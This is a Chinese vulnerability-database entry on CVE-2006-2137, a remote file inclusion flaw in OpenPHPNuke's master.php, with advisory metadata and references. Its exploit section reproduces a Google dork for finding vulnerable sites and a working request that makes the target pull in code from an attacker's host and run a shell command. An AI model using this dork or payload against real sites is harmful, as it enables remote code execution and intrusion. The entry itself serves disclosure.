OpenPHPNuke master.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110171 漏洞类型 输入验证
发布时间 2006-04-29 更新时间 2006-05-02
CVE编号 CVE-2006-2137 CNNVD-ID CNNVD-200605-029
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1727
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-029
|漏洞详情
OpenPHPNuke及2.3.3之前版本的master.php存在PHP远程文件包含漏洞,远程攻击者可以通过root_path参数中的URL执行任意PHP代码。
|漏洞EXP
Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]
|参考资料

来源:www.openphpnuke.com
链接:http://www.openphpnuke.com/system/article/index.php?opnparams=B3YBZAI3BWgEbFU0
来源:VUPEN
名称:ADV-2006-1575
链接:http://www.frsirt.com/english/advisories/2006/1575
来源:SECUNIA
名称:19893
链接:http://secunia.com/advisories/19893
来源:MILW0RM
名称:1727
链接:http://milw0rm.com/exploits/1727
来源:XF
名称:openphpnuke-master-file-include(26183)
链接:http://xforce.iss.net/xforce/xfdb/26183
来源:BID
名称:17772
链接:http://www.securityfocus.com/bid/17772
来源:OSVDB
名称:25140
链接:http://www.osvdb.org/25140